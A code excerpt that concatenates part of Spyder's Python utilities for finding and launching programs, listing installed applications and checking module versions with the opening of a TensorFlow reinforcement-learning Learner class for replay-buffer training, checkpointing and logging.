b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif sys.platform.startswith('linux'):
pyenv = [
osp.join('/usr', 'local', 'bin'),
osp.join(home, '.pyenv', 'bin')
]
a = [home, '/opt']
b = ['anaconda', 'miniconda', 'anaconda3', 'miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
elif os.name == 'nt':
pyenv = [osp.join(home, '.pyenv', 'pyenv-win', 'bin')]
a = [home, 'C:\\', osp.join('C:\\', 'ProgramData')]
b = ['Anaconda', 'Miniconda', 'Anaconda3', 'Miniconda3']
conda = [osp.join(*p, 'condabin') for p in itertools.product(a, b)]
req_paths.extend(pyenv + conda)
for path in os.environ['PATH'].split(os.pathsep) + req_paths:
abspath = osp.join(path, basename)
if osp.isfile(abspath):
return abspath
def find_program(basename):
"""
Find program in PATH and return absolute path
Try adding .exe or .bat to basename on Windows platforms
(return None if not found)
"""
names = [basename]
if os.name == 'nt':
# Windows platforms
extensions = ('.exe', '.bat', '.cmd')
if not basename.endswith(extensions):
names = [basename+ext for ext in extensions]+[basename]
for name in names:
path = is_program_installed(name)
if path:
return path
def get_full_command_for_program(path):
"""
Return the list of tokens necessary to open the program
at a given path.
On macOS systems, this function prefixes .app paths with
'open -a', which is necessary to run the application.
On all other OS's, this function has no effect.
:str path: The path of the program to run.
:return: The list of tokens necessary to run the program.
"""
if sys.platform == 'darwin' and path.endswith('.app'):
return ['open', '-a', path]
return [path]
def alter_subprocess_kwargs_by_platform(**kwargs):
"""
Given a dict, populate kwargs to create a generally
useful default setup for running subprocess processes
on different platforms. For example, `close_fds` is
set on posix and creation of a new console window is
disabled on Windows.
This function will alter the given kwargs and return
the modified dict.
"""
kwargs.setdefault('close_fds', os.name == 'posix')
if os.name == 'nt':
CONSOLE_CREATION_FLAGS = 0 # Default value
# See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx
CREATE_NO_WINDOW = 0x08000000
# We "or" them together
CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW
kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)
# ensure Windows subprocess environment has SYSTEMROOT
if kwargs.get('env') is not None:
# Is SYSTEMROOT, SYSTEMDRIVE in env? case insensitive
for env_var in ['SYSTEMROOT', 'SYSTEMDRIVE']:
if env_var not in map(str.upper, kwargs['env'].keys()):
# Add from os.environ
for k, v in os.environ.items():
if env_var == k.upper():
kwargs['env'].update({k: v})
break # don't risk multiple values
else:
# linux and macOS
if kwargs.get('env') is not None:
if 'HOME' not in kwargs['env']:
kwargs['env'].update({'HOME': get_home_dir()})
return kwargs
def run_shell_command(cmdstr, **subprocess_kwargs):
"""
Execute the given shell command.
Note that *args and **kwargs will be passed to the subprocess call.
If 'shell' is given in subprocess_kwargs it must be True,
otherwise ProgramError will be raised.
If 'executable' is not given in subprocess_kwargs, it will
be set to the value of the SHELL environment variable.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str cmdstr: The string run as a shell command.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and not subprocess_kwargs['shell']:
raise ProgramError(
'The "shell" kwarg may be omitted, but if '
'provided it must be True.')
else:
subprocess_kwargs['shell'] = True
# Don't pass SHELL to subprocess on Windows because it makes this
# function fail in Git Bash (where SHELL is declared; other Windows
# shells don't set it).
if not os.name == 'nt':
if 'executable' not in subprocess_kwargs:
subprocess_kwargs['executable'] = os.getenv('SHELL')
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(cmdstr, **subprocess_kwargs)
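# Hedged usage sketch (illustrative command; output depends on the shell):
#
#   proc = run_shell_command('echo hello')
#   stdout, stderr = proc.communicate()   # stdout == b'hello\n' on POSIX shells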
def run_program(program, args=None, **subprocess_kwargs):
"""
Run program in a separate process.
NOTE: returns the process object created by
`subprocess.Popen()`. This can be used with
`proc.communicate()` for example.
If 'shell' appears in the kwargs, it must be False,
otherwise ProgramError will be raised.
If only the program name is given and not the full path,
a lookup will be performed to find the program. If the
lookup fails, ProgramError will be raised.
Note that stdin, stdout and stderr will be set by default
to PIPE unless specified in subprocess_kwargs.
:str program: The name of the program to run.
:list args: The program arguments.
:subprocess_kwargs: These will be passed to subprocess.Popen.
"""
if 'shell' in subprocess_kwargs and subprocess_kwargs['shell']:
raise ProgramError(
"This function is only for non-shell programs, "
"use run_shell_command() instead.")
fullcmd = find_program(program)
if not fullcmd:
raise ProgramError("Program %s was not found" % program)
# As per subprocess, we make a complete list of prog+args
fullcmd = get_full_command_for_program(fullcmd) + (args or [])
for stream in ['stdin', 'stdout', 'stderr']:
subprocess_kwargs.setdefault(stream, subprocess.PIPE)
subprocess_kwargs = alter_subprocess_kwargs_by_platform(
**subprocess_kwargs)
return subprocess.Popen(fullcmd, **subprocess_kwargs)
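# Hedged usage sketch (assumes 'git' is installed and found by find_program):
#
#   proc = run_program('git', ['--version'])
#   stdout, _ = proc.communicate()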
def parse_linux_desktop_entry(fpath):
"""Load data from desktop entry with xdg specification."""
from xdg.DesktopEntry import DesktopEntry
try:
entry = DesktopEntry(fpath)
entry_data = {}
entry_data['name'] = entry.getName()
entry_data['icon_path'] = entry.getIcon()
entry_data['exec'] = entry.getExec()
entry_data['type'] = entry.getType()
entry_data['hidden'] = entry.getHidden()
entry_data['fpath'] = fpath
except Exception:
entry_data = {
'name': '',
'icon_path': '',
'hidden': '',
'exec': '',
'type': '',
'fpath': fpath
}
return entry_data
def _get_mac_application_icon_path(app_bundle_path):
"""Parse mac application bundle and return path for *.icns file."""
import plistlib
contents_path = info_path = os.path.join(app_bundle_path, 'Contents')
info_path = os.path.join(contents_path, 'Info.plist')
pl = {}
if os.path.isfile(info_path):
try:
# readPlist is deprecated but needed for py27 compat
pl = plistlib.readPlist(info_path)
except Exception:
pass
icon_file = pl.get('CFBundleIconFile')
icon_path = None
if icon_file:
icon_path = os.path.join(contents_path, 'Resources', icon_file)
# Some app bundles seem to list the icon name without extension
if not icon_path.endswith('.icns'):
icon_path = icon_path + '.icns'
if not os.path.isfile(icon_path):
icon_path = None
return icon_path
def get_username():
"""Return current session username."""
if os.name == 'nt':
username = os.getlogin()
else:
import pwd
username = pwd.getpwuid(os.getuid())[0]
return username
def _get_win_reg_info(key_path, hive, flag, subkeys):
"""
See: https://stackoverflow.com/q/53132434
"""
import winreg
reg = winreg.ConnectRegistry(None, hive)
software_list = []
try:
key = winreg.OpenKey(reg, key_path, 0, winreg.KEY_READ | flag)
count_subkey = winreg.QueryInfoKey(key)[0]
for index in range(count_subkey):
software = {}
try:
subkey_name = winreg.EnumKey(key, index)
if not (subkey_name.startswith('{')
and subkey_name.endswith('}')):
software['key'] = subkey_name
subkey = winreg.OpenKey(key, subkey_name)
for property in subkeys:
try:
value = winreg.QueryValueEx(subkey, property)[0]
software[property] = value
except EnvironmentError:
software[property] = ''
software_list.append(software)
except EnvironmentError:
continue
except Exception:
pass
return software_list
def _clean_win_application_path(path):
"""Normalize windows path and remove extra quotes."""
path = path.replace('\\', '/').lower()
# Check for quotes at start and end
if path[0] == '"' and path[-1] == '"':
path = literal_eval(path)
return path
def _get_win_applications():
"""Return all system installed windows applications."""
import winreg
# See:
# https://docs.microsoft.com/en-us/windows/desktop/shell/app-registration
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'
# Hive and flags
hfs = [
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_32KEY),
(winreg.HKEY_LOCAL_MACHINE, winreg.KEY_WOW64_64KEY),
(winreg.HKEY_CURRENT_USER, 0),
]
subkeys = [None]
sort_key = 'key'
app_paths = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
if software[None]:
key = software['key'].capitalize().replace('.exe', '')
expanded_fpath = os.path.expandvars(software[None])
expanded_fpath = _clean_win_application_path(expanded_fpath)
app_paths[key] = expanded_fpath
# See:
# https://www.blog.pythonlibrary.org/2010/03/03/finding-installed-software-using-python/
# https://stackoverflow.com/q/53132434
key_path = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'
subkeys = ['DisplayName', 'InstallLocation', 'DisplayIcon']
sort_key = 'DisplayName'
apps = {}
_apps = [_get_win_reg_info(key_path, hf[0], hf[1], subkeys) for hf in hfs]
software_list = itertools.chain(*_apps)
for software in sorted(software_list, key=lambda x: x[sort_key]):
location = software['InstallLocation']
name = software['DisplayName']
icon = software['DisplayIcon']
key = software['key']
if name and icon:
icon = icon.replace('"', '')
icon = icon.split(',')[0]
if location == '' and icon:
location = os.path.dirname(icon)
if not os.path.isfile(icon):
icon = ''
if location and os.path.isdir(location):
files = [f for f in os.listdir(location)
if os.path.isfile(os.path.join(location, f))]
if files:
for fname in files:
fn_low = fname.lower()
valid_file = fn_low.endswith(('.exe', '.com', '.bat'))
if valid_file and not fn_low.startswith('unins'):
fpath = os.path.join(location, fname)
expanded_fpath = os.path.expandvars(fpath)
expanded_fpath = _clean_win_application_path(
expanded_fpath)
apps[name + ' (' + fname + ')'] = expanded_fpath
# Join data
values = list(zip(*apps.values()))[-1]
for name, fpath in app_paths.items():
if fpath not in values:
apps[name] = fpath
return apps
def _get_linux_applications():
"""Return all system installed linux applications."""
# See:
# https://standards.freedesktop.org/desktop-entry-spec/desktop-entry-spec-latest.html
# https://askubuntu.com/q/433609
apps = {}
desktop_app_paths = [
'/usr/share/**/*.desktop',
'~/.local/share/**/*.desktop',
]
all_entries_data = []
for path in desktop_app_paths:
fpaths = glob.glob(path)
for fpath in fpaths:
entry_data = parse_linux_desktop_entry(fpath)
all_entries_data.append(entry_data)
for entry_data in sorted(all_entries_data, key=lambda x: x['name']):
if not entry_data['hidden'] and entry_data['type'] == 'Application':
apps[entry_data['name']] = entry_data['fpath']
return apps
def _get_mac_applications():
"""Return all system installed osx applications."""
apps = {}
app_folders = [
'/**/*.app',
'/Users/{}/**/*.app'.format(get_username())
]
fpaths = []
for path in app_folders:
fpaths += glob.glob(path)
for fpath in fpaths:
if os.path.isdir(fpath):
name = os.path.basename(fpath).split('.app')[0]
apps[name] = fpath
return apps
def get_application_icon(fpath):
"""Return application icon or default icon if not found."""
from qtpy.QtGui import QIcon
from spyder.utils import icon_manager as ima
if os.path.isfile(fpath) or os.path.isdir(fpath):
icon = ima.icon('no_match')
if sys.platform == 'darwin':
icon_path = _get_mac_application_icon_path(fpath)
if icon_path and os.path.isfile(icon_path):
icon = QIcon(icon_path)
elif os.name == 'nt':
pass
else:
entry_data = parse_linux_desktop_entry(fpath)
icon_path = entry_data['icon_path']
if icon_path:
if os.path.isfile(icon_path):
icon = QIcon(icon_path)
else:
icon = QIcon.fromTheme(icon_path)
else:
icon = ima.icon('help')
return icon
def get_installed_applications():
"""
Return all system installed applications.
The return value is a list of tuples where the first item is the icon path
and the second item is the program executable path.
"""
apps = {}
if sys.platform == 'darwin':
apps = _get_mac_applications()
elif os.name == 'nt':
apps = _get_win_applications()
else:
apps = _get_linux_applications()
if sys.platform == 'darwin':
apps = {key: val for (key, val) in apps.items() if osp.isdir(val)}
else:
apps = {key: val for (key, val) in apps.items() if osp.isfile(val)}
return apps
def open_files_with_application(app_path, fnames):
"""
Generalized method for opening files with a specific application.
Returns a dictionary of the command used and the return code.
A code equal to 0 means the application executed successfully.
"""
return_codes = {}
if os.name == 'nt':
fnames = [fname.replace('\\', '/') for fname in fnames]
if sys.platform == 'darwin':
if not (app_path.endswith('.app') and os.path.isdir(app_path)):
raise ValueError('`app_path` must point to a valid OSX '
'application!')
cmd = ['open', '-a', app_path] + fnames
try:
return_code = subprocess.call(cmd)
except Exception:
return_code = 1
return_codes[' '.join(cmd)] = return_code
elif os.name == 'nt':
if not (app_path.endswith(('.exe', '.bat', '.com', '.cmd'))
and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Windows '
'executable!')
cmd = [app_path] + fnames
try:
return_code = subprocess.call(cmd)
except OSError:
return_code = 1
return_codes[' '.join(cmd)] = return_code
else:
if not (app_path.endswith('.desktop') and os.path.isfile(app_path)):
raise ValueError('`app_path` must point to a valid Linux '
'application!')
entry = parse_linux_desktop_entry(app_path)
app_path = entry['exec']
multi = []
extra = []
if len(fnames) == 1:
fname = fnames[0]
if '%u' in app_path:
cmd = app_path.replace('%u', fname)
elif '%f' in app_path:
cmd = app_path.replace('%f', fname)
elif '%U' in app_path:
cmd = app_path.replace('%U', fname)
elif '%F' in app_path:
cmd = app_path.replace('%F', fname)
else:
cmd = app_path
extra = fnames
elif len(fnames) > 1:
if '%U' in app_path:
cmd = app_path.replace('%U', ' '.join(fnames))
elif '%F' in app_path:
cmd = app_path.replace('%F', ' '.join(fnames))
if '%u' in app_path:
for fname in fnames:
multi.append(app_path.replace('%u', fname))
elif '%f' in app_path:
for fname in fnames:
multi.append(app_path.replace('%f', fname))
else:
cmd = app_path
extra = fnames
if multi:
for cmd in multi:
try:
return_code = subprocess.call([cmd], shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
else:
try:
return_code = subprocess.call([cmd] + extra, shell=True)
except Exception:
return_code = 1
return_codes[cmd] = return_code
return return_codes
def python_script_exists(package=None, module=None):
"""
Return absolute path if Python script exists (otherwise, return None)
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
if package is None:
spec = importlib.util.find_spec(module)
if spec:
path = spec.origin
else:
path = None
else:
spec = importlib.util.find_spec(package)
if spec:
path = osp.join(spec.origin, module)+'.py'
else:
path = None
if path:
if not osp.isfile(path):
path += 'w'
if osp.isfile(path):
return path
def run_python_script(package=None, module=None, args=[], p_args=[]):
"""
Run Python script in a separate process
package=None -> module is in sys.path (standard library modules)
"""
assert module is not None
assert isinstance(args, (tuple, list)) and isinstance(p_args, (tuple, list))
path = python_script_exists(package, module)
run_program(sys.executable, p_args + [path] + args)
def shell_split(text):
"""
Split the string `text` using shell-like syntax
This avoids breaking single/double-quoted strings (e.g. containing
strings with spaces). This function is almost equivalent to the shlex.split
function (see standard library `shlex`) except that it supports
unicode strings (shlex did not support unicode until Python 2.7.3).
"""
assert is_text_string(text) # in case a QString is passed...
pattern = r'(\s+|(?<!\\)".*?(?<!\\)"|(?<!\\)\'.*?(?<!\\)\')'
out = []
for token in re.split(pattern, text):
if token.strip():
out.append(token.strip('"').strip("'"))
return out
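# Worked example (illustrative):
#
#   shell_split('python -c "import this" --option value')
#   # -> ['python', '-c', 'import this', '--option', 'value']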
def get_python_args(fname, python_args, interact, debug, end_args):
"""Construct Python interpreter arguments"""
p_args = []
if python_args is not None:
p_args += python_args.split()
if interact:
p_args.append('-i')
if debug:
p_args.extend(['-m', 'pdb'])
if fname is not None:
if os.name == 'nt' and debug:
# When calling pdb on Windows, one has to replace backslashes by
# slashes to avoid confusion with escape characters (otherwise,
# for example, '\t' will be interpreted as a tabulation):
p_args.append(osp.normpath(fname).replace(os.sep, '/'))
else:
p_args.append(fname)
if end_args:
p_args.extend(shell_split(end_args))
return p_args
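# Worked example (illustrative file name and arguments):
#
#   get_python_args('script.py', '-u', interact=True, debug=False,
#                   end_args='--foo bar')
#   # -> ['-u', '-i', 'script.py', '--foo', 'bar']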
def run_python_script_in_terminal(fname, wdir, args, interact,
debug, python_args, executable=None):
"""
Run Python script in an external system terminal.
:str wdir: working directory, may be empty.
"""
if executable is None:
executable = get_python_executable()
# If fname or python_exe contains spaces, it can't be run on Windows, so we
# have to enclose them in quotes. Also wdir can come with / as os.sep, so
# we need to take care of it.
if os.name == 'nt':
fname = '"' + fname + '"'
wdir = wdir.replace('/', '\\')
executable = '"' + executable + '"'
p_args = [executable]
p_args += get_python_args(fname, python_args, interact, debug, args)
if os.name == 'nt':
cmd = 'start cmd.exe /K "'
if wdir:
cmd += 'cd ' + wdir + ' && '
cmd += ' '.join(p_args) + '"' + ' ^&^& exit'
# Command line and cwd have to be converted to the filesystem
# encoding before passing them to subprocess, but only for
# Python 2.
# See https://bugs.python.org/issue1759845#msg74142 and
# spyder-ide/spyder#1856.
if PY2:
cmd = encoding.to_fs_from_unicode(cmd)
wdir = encoding.to_fs_from_unicode(wdir)
try:
if wdir:
run_shell_command(cmd, cwd=wdir)
else:
run_shell_command(cmd)
except WindowsError:
from qtpy.QtWidgets import QMessageBox
from spyder.config.base import _
QMessageBox.critical(None, _('Run'),
_("It was not possible to run this file in "
"an external terminal"),
QMessageBox.Ok)
elif sys.platform.startswith('linux'):
programs = [{'cmd': 'gnome-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'konsole',
'wdir-option': '--workdir',
'execute-option': '-e'},
{'cmd': 'xfce4-terminal',
'wdir-option': '--working-directory',
'execute-option': '-x'},
{'cmd': 'xterm',
'wdir-option': None,
'execute-option': '-e'},]
for program in programs:
if is_program_installed(program['cmd']):
arglist = []
if program['wdir-option'] and wdir:
arglist += [program['wdir-option'], wdir]
arglist.append(program['execute-option'])
arglist += p_args
if wdir:
run_program(program['cmd'], arglist, cwd=wdir)
else:
run_program(program['cmd'], arglist)
return
elif sys.platform == 'darwin':
f = tempfile.NamedTemporaryFile('wt', prefix='run_spyder_',
suffix='.sh', dir=get_temp_dir(),
delete=False)
if wdir:
f.write('cd {}\n'.format(wdir))
f.write(' '.join(p_args))
f.close()
os.chmod(f.name, 0o777)
def run_terminal_thread():
proc = run_shell_command('open -a Terminal.app ' + f.name)
# Prevent race condition
time.sleep(3)
proc.wait()
os.remove(f.name)
thread = threading.Thread(target=run_terminal_thread)
thread.start()
else:
raise NotImplementedError
def check_version(actver, version, cmp_op):
"""
Check version string of an active module against a required version.
If dev/prerelease tags result in TypeError for string-number comparison,
it is assumed that the dependency is satisfied.
Users on dev branches are responsible for keeping their own packages up to
date.
Copyright (C) 2013 The IPython Development Team
Distributed under the terms of the BSD License.
"""
if isinstance(actver, tuple):
actver = '.'.join([str(i) for i in actver])
# Hacks needed so that LooseVersion understands that (for example)
# version = '3.0.0' is in fact bigger than actver = '3.0.0rc1'
if is_stable_version(version) and not is_stable_version(actver) and \
actver.startswith(version) and version != actver:
version = version + 'zz'
elif is_stable_version(actver) and not is_stable_version(version) and \
version.startswith(actver) and version != actver:
actver = actver + 'zz'
try:
if cmp_op == '>':
return LooseVersion(actver) > LooseVersion(version)
elif cmp_op == '>=':
return LooseVersion(actver) >= LooseVersion(version)
elif cmp_op == '=':
return LooseVersion(actver) == LooseVersion(version)
elif cmp_op == '<':
return LooseVersion(actver) < LooseVersion(version)
elif cmp_op == '<=':
return LooseVersion(actver) <= LooseVersion(version)
else:
return False
except TypeError:
return True
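# Worked examples (illustrative version strings):
#
#   check_version('0.13.1', '0.13', '>=')     # True
#   check_version('3.0.0rc1', '3.0.0', '>=')  # False (prerelease < stable)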
def get_module_version(module_name):
"""Return module version or None if version can't be retrieved."""
mod = __import__(module_name)
ver = getattr(mod, '__version__', getattr(mod, 'VERSION', None))
if not ver:
ver = get_package_version(module_name)
return ver
def get_package_version(package_name):
"""Return package version or None if version can't be retrieved."""
# When support for Python 3.7 and below is dropped, this can be replaced
# with the built-in importlib.metadata.version
try:
ver = pkg_resources.get_distribution(package_name).version
return ver
except pkg_resources.DistributionNotFound:
return None
def is_module_installed(module_name, version=None, interpreter=None):
"""
Return True if module ``module_name`` is installed
If ``version`` is not None, checks that the module's installed version is
consistent with ``version``. The module must have an attribute named
'__version__' or 'VERSION'.
version may start with =, >=, >, <= or < to specify the exact requirement;
multiple conditions may be separated by ';' (e.g. '>=0.13;<1.0')
If ``interpreter`` is not None, checks if a module is installed with a
given ``version`` in the ``interpreter``'s environment. Otherwise checks
in Spyder's environment.
"""
if interpreter is not None:
if is_python_interpreter(interpreter):
cmd = dedent("""
try:
import {} as mod
except Exception:
print('No Module') # spyder: test-skip
print(getattr(mod, '__version__', getattr(mod, 'VERSION', None))) # spyder: test-skip
""").format(module_name)
try:
# use clean environment
proc = run_program(interpreter, ['-c', cmd], env={})
stdout, stderr = proc.communicate()
stdout = stdout.decode().strip()
except Exception:
return False
if 'No Module' in stdout:
return False
elif stdout != 'None':
# the module is installed and it has a version attribute
module_version = stdout
else:
module_version = None
else:
# Try not to make a wrong decision if the interpreter check fails
return True
else:
# interpreter is None, just get module version in Spyder environment
try:
module_version = get_module_version(module_name)
except Exception:
# Module is not installed
return False
# This can happen if a package was not uninstalled correctly. For
# instance, if its __pycache__ main directory is left behind.
try:
mod = __import__(module_name)
if not getattr(mod, '__file__', None):
return False
except Exception:
pass
if version is None:
return True
else:
if ';' in version:
versions = version.split(';')
else:
versions = [version]
output = True
for _ver in versions:
match = re.search(r'[0-9]', _ver)
assert match is not None, "Invalid version number"
symb = _ver[:match.start()]
if not symb:
symb = '='
assert symb in ('>=', '>', '=', '<', '<='),\
"Invalid version condition '%s'" % symb
ver = _ver[match.start():]
output = output and check_version(module_version, ver, symb)
return output
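# Hedged usage sketch (illustrative module name and version specs):
#
#   is_module_installed('numpy')                 # True if importable
#   is_module_installed('numpy', '>=1.0;<9.0')   # combine conditions with ';'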
def is_python_interpreter_valid_name(filename):
"""Check that the python interpreter file has a valid name."""
pattern = r'.*python(\d\.?\d*)?(w)?(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def is_python_interpreter(filename):
"""Evaluate whether a file is a python interpreter or not."""
real_filename = os.path.realpath(filename) # To follow symlink if existent
if (not osp.isfile(real_filename) or
not is_python_interpreter_valid_name(filename)):
return False
elif is_pythonw(filename):
if os.name == 'nt':
# pythonw is a binary on Windows
if not encoding.is_text_file(real_filename):
return True
else:
return False
elif sys.platform == 'darwin':
# pythonw is a text file in Anaconda but a binary in
# the system
if is_anaconda() and encoding.is_text_file(real_filename):
return True
elif not encoding.is_text_file(real_filename):
return True
else:
return False
else:
# There's no pythonw in other systems
return False
elif encoding.is_text_file(real_filename):
# At this point we can't have a text file
return False
else:
return check_python_help(filename)
def is_pythonw(filename):
"""Check that the python interpreter has 'pythonw'."""
pattern = r'.*python(\d\.?\d*)?w(.exe)?$'
if re.match(pattern, filename, flags=re.I) is None:
return False
else:
return True
def check_python_help(filename):
"""Check that the python interpreter can compile and provide the zen."""
try:
proc = run_program(filename, ['-c', 'import this'], env={})
stdout, _ = proc.communicate()
stdout = to_text_string(stdout)
valid_lines = [
'Beautiful is better than ugly.',
'Explicit is better than implicit.',
'Simple is better than complex.',
'Complex is better than complicated.',
]
if all(line in stdout for line in valid_lines):
return True
else:
return False
except Exception:
return False
def is_spyder_process(pid):
"""
Test whether given PID belongs to a Spyder process.
This is checked by testing the first three command line arguments. This
function returns a bool. If there is no process with this PID or its
command line cannot be accessed (perhaps because the process is owned by
another user), then the function returns False.
"""
try:
p = psutil.Process(int(pid))
# Valid names for main script
names = set(['spyder', 'spyder3', 'spyder.exe', 'spyder3.exe',
'bootstrap.py', 'spyder-script.py', 'Spyder.launch.pyw'])
if running_under_pytest():
names.add('runtests.py')
# Check the first three command line arguments
arguments = set(os.path.basename(arg) for arg in p.cmdline()[:3])
conditions = [names & arguments]
return any(conditions)
except (psutil.NoSuchProcess, psutil.AccessDenied):
return False
def get_interpreter_info(path):
"""Return version information of the selected Python interpreter."""
try:
out, __ = run_program(path, ['-V']).communicate()
out = out.decode()
except Exception:
out = ''
return out.strip()
def find_git():
"""Find git executable in the system."""
if sys.platform == 'darwin':
proc = subprocess.run(
osp.join(HERE, "check-git.sh"), capture_output=True)
if proc.returncode != 0:
return None
return find_program('git')
else:
return find_program('git')
|
learner.py
|
from __future__ import division
from __future__ import print_function
from builtins import zip
from builtins import range
from builtins import object
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import traceback, threading, time, warnings
import tensorflow as tf
import numpy as np
import util
from replay import ReplayBuffer
class Learner(object):
"""
Generic object which runs the main training loop of anything that trains using
a replay buffer. Handles updating, logging, saving/loading, batching, etc.
"""
def __init__(self, interactor_queue, lock, config, env_config, learner_config, **bonus_kwargs):
self.learner_name = self.learner_name()
self.interactor_queue = interactor_queue
self.learner_lock = lock
self.config = config
self.env_config = env_config
self.learner_config = learner_config
self.bonus_kwargs = bonus_kwargs
self.kill_threads = False
self.permit_desync = False
self.need_frames_notification = threading.Condition()
self._reset_inspections()
self.total_frames = 0
np.random.seed(self.config["seed"])
tf.set_random_seed(self.config["seed"])
self.save_path = util.create_directory("%s/%s/%s/%s" % (self.config["output_root"], self.config["env"]["name"], self.config["name"], self.config["save_model_path"]))
self.log_path = util.create_directory("%s/%s/%s/%s" % (self.config["output_root"], self.config["env"]["name"], self.config["name"], self.config["log_path"])) + "/%s.log" % self.learner_name
# replay buffer to store data
self.replay_buffer_lock = threading.RLock()
self.replay_buffer = ReplayBuffer(self.learner_config["replay_size"],
np.prod(self.env_config["obs_dims"]),
self.env_config["action_dim"])
# data loaders pull data from the replay buffer and put it into the tfqueue for model usage
self.data_loaders = self.make_loader_placeholders()
queue_capacity = np.ceil(1./self.learner_config["frames_per_update"]) if self.learner_config["frames_per_update"] else 100
self.tf_queue = tf.FIFOQueue(capacity=queue_capacity, dtypes=[dl.dtype for dl in self.data_loaders])
self.enqueue_op = self.tf_queue.enqueue(self.data_loaders)
self.current_batch = self.tf_queue.dequeue()
# build the TF graph for the actual model to train
self.core, self.train_losses, self.train_ops, self.inspect_losses = self.make_core_model()
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
## Mandatory functions to override
def learner_name(self): raise Exception('unimplemented: learner_name')
def make_loader_placeholders(self): raise Exception('unimplemented: make_loader_placeholders')
def make_core_model(self): raise Exception('unimplemented: make_core_model')
## Optional functions to override
def initialize(self): warnings.warn('unimplemented: initialize')
def resume_from_checkpoint(self, epoch): warnings.warn('unimplemented: resume_from_checkpoint')
def checkpoint(self): warnings.warn('unimplemented: checkpoint')
def backup(self): warnings.warn('unimplemented: backup')
## Internal functions
def _start(self):
# fetch data from the interactors to pre-fill the replay buffer
self.prefetch_thread = threading.Thread(target=self._poll_interactors, args=(True, self.learner_config["frames_before_learning"],))
self.prefetch_thread.start()
self.prefetch_thread.join()
# start the interactor and data loader
self.data_load_thread = threading.Thread(target=self._run_enqueue_data)
self.data_load_thread.start()
# initialize the learner, pretraining if needed
if self.config["resume"]: self._resume_from_checkpoint()
else: self._initialize()
# re-sync everything, and start up interactions with the environment
self.interactor_poll_thread = threading.Thread(target=self._poll_interactors)
self.interactor_poll_thread.start()
# start the clock
self._last_checkpoint_time = time.time()
def _learn(self, permit_desync=False, log=True, checkpoint=True, backup=True):
# this is to keep the frames/update synced properly
if self.learner_config["frames_per_update"] is not False and not permit_desync:
if not self._have_enough_frames():
with self.need_frames_notification:
self.need_frames_notification.notify()
return
# log
if log and (self.update_i + 1) % self.learner_config["log_every_n"] == 0:
self._log()
# checkpoint
if checkpoint and (self.update_i + 1) % self.learner_config["epoch_every_n"] == 0:
self._checkpoint()
# backup
if backup and (self.update_i + 1) % self.learner_config["backup_every_n"] == 0:
self._backup()
# train
self._training_step()
def _have_enough_frames(self):
gathered_frames = self.total_frames - self.learner_config["frames_before_learning"]
return gathered_frames > self.learner_config["frames_per_update"] * self.update_i
def _initialize(self):
self.epoch = 0
self.update_i = 0
self.hours = 0
self._last_checkpoint_time = time.time()
self.initialize()
if self.learner_config["pretrain_n"]: self._pretrain()
self._checkpoint()
def _pretrain(self):
for _ in range(self.learner_config["pretrain_n"]):
self._learn(permit_desync=True, checkpoint=False, backup=False)
self.epoch = 0
self.update_i = 0
def _resume_from_checkpoint(self):
epoch = util.get_largest_epoch_in_dir(self.save_path, self.core.saveid)
if not self.config['keep_all_replay_buffers']: util.wipe_all_but_largest_epoch_in_dir(self.save_path, self.core.saveid)
if epoch is False:
raise Exception("Tried to reload but no model found")
with self.learner_lock:
self.core.load(self.sess, self.save_path, epoch)
self.epoch, self.update_i, self.total_frames, self.hours = self.sess.run([self.core.epoch_n, self.core.update_n, self.core.frame_n, self.core.hours])
with self.replay_buffer_lock:
self.replay_buffer.load(self.save_path, '%09d_%s' % (epoch, self.learner_name))
self.resume_from_checkpoint(epoch)
def _log(self):
if self.denom > 0:
logstring = "(%3.2f sec) h%-8.2f e%-8d s%-8d f%-8d\t" % (time.time() - self._log_time, self.hours, self.epoch, self.update_i + 1, self.total_frames) + ', '.join(["%8f" % x for x in (self.running_total / self.denom).tolist()])
print("%s\t%s" % (self.learner_name, logstring))
with open(self.log_path, "a") as f: f.write(logstring + "\n")
self._reset_inspections()
def _reset_inspections(self):
self.running_total = 0.
self.denom = 0.
self._log_time = time.time()
def _checkpoint(self):
self.checkpoint()
self.epoch += 1
self.hours += (time.time() - self._last_checkpoint_time) / 3600.
self._last_checkpoint_time = time.time()
self.core.update_epoch(self.sess, self.epoch, self.update_i, self.total_frames, self.hours)
with self.learner_lock: self.core.save(self.sess, self.save_path)
def _backup(self):
self.backup()
if not self.learner_config['keep_all_replay_buffers']: util.wipe_all_but_largest_epoch_in_dir(self.save_path, self.core.saveid)
with self.learner_lock:
self.core.save(self.sess, self.save_path, self.epoch)
with self.replay_buffer_lock:
